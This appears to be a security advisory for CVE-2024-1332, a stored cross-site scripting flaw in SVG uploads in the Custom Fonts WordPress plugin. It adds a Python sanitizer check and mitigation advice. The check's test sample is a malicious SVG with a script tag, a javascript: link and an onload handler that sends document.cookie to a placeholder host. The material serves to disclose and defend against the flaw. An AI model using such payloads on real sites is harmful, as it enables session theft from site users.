WordPress · Custom Fonts – Host Your Fonts Locally · CVE-2024-1332
**Name of the Vulnerable Software and Affected Versions**
Custom Fonts – Host Your Fonts Locally plugin for WordPress versions up to, and including, 2.1.4
**Description**
The plugin does not sufficiently sanitize uploaded SVG files or escape their contents on output. An authenticated attacker with the Author role or higher can upload an SVG that carries active content (for example a `<script>` element, an `on*` event-handler attribute, or a `javascript:` link), and that content is stored on the site. The script then executes in the browser of any user who opens a page where the SVG is injected, which makes this a Stored Cross-Site Scripting (XSS) issue rather than a one-off reflected one.
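The following is an added illustration, not code from the plugin or from the advisory: a minimal deny-list check of the kind that would have stopped the payloads described above, run over two constructed SVG inputs (a benign icon and a script-bearing upload). It uses only the Python standard library; the element and attribute lists are my own choices and a production sanitizer should instead allow-list the elements and attributes it accepts.

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs (not real uploads): a benign icon and a stored-XSS
# payload of the kind an Author-level user could upload where SVGs are not sanitized.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#333"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>alert(document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="5" y="15">click</text></a>
  <rect width="10" height="10" onload="fetch('https://example.invalid/?c='+document.cookie)"/>
</svg>"""

# Elements that can execute or pull in active content. Deny-list for illustration only;
# a real sanitizer should allow-list the shapes/paint elements it actually needs.
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "use"}


def local_name(qualified):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1].lower()


def normalized_value(value):
    """Remove all whitespace and lower-case, so 'java\\nscript:' is still caught."""
    return "".join(value.split()).lower()


def find_active_content(svg_bytes):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Malformed XML is rejected outright rather than guessed at.
        return ["unparseable SVG: %s" % exc]

    for el in root.iter():
        name = local_name(el.tag)
        if name in DANGEROUS_TAGS:
            findings.append("element <%s>" % name)
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.startswith("on"):
                findings.append("event handler %s on <%s>" % (aname, name))
            elif aname in ("href", "src") and normalized_value(value).startswith(
                ("javascript:", "data:")
            ):
                findings.append("%s with %s scheme on <%s>" % (aname, value.split(":")[0], name))
    return findings


def is_safe_svg(svg_bytes):
    """True only when the deny-list check found nothing; reject on any finding."""
    return not find_active_content(svg_bytes)


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, "->", "accept" if is_safe_svg(sample) else find_active_content(sample))
```

Note that an SVG served from the site's own origin executes scripts only when opened as a document (a direct link to the file URL), not when embedded via `<img>`; a belt-and-braces mitigation for an upload endpoint is therefore to serve user-uploaded SVGs with a `Content-Security-Policy: sandbox` or `Content-Disposition: attachment` header in addition to sanitizing them.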
**Recommendations**
If you run version 2.1.4 or earlier, update to a release that fixes the SVG sanitization and output escaping issue (check the plugin's changelog for the first fixed version). Until the update is applied, restrict SVG uploads to trusted administrators rather than the Author role, or sanitize uploaded SVGs and serve them with headers that prevent inline script execution, to close off this Stored Cross-Site Scripting vector.